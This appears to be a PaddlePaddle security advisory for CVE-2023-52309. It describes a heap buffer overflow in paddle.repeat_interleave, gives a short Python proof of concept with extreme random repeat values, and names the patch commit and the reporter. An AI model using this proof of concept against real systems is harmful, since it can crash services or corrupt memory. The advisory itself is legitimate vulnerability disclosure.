Skip to content

Latest commit

 

History

History
32 lines (19 loc) · 993 Bytes

pdsa-2023-018.md

File metadata and controls

32 lines (19 loc) · 993 Bytes

PDSA-2023-018: Heap buffer overflow in paddle.repeat_interleave

CVE Number

CVE-2023-52309

Impact

Heap buffer overflow in paddle.repeat_interleave by using invalid params. The PoC is as follows:

import paddle
import numpy as np

x = paddle.to_tensor(np.random.uniform(-6666666, 100000000, [4, 4, 8, 3, 2, 4]).astype(np.float64))
repeats = paddle.to_tensor(np.random.uniform(-2147483648, 2147483647, [2, 1]).astype(np.int32))

paddle.repeat_interleave(x, repeats, axis=-2)

Patches

We have patched the issue in commit 19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc. The fix will be included in PaddlePaddle 2.6.0.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Tong Liu of CAS-IIE.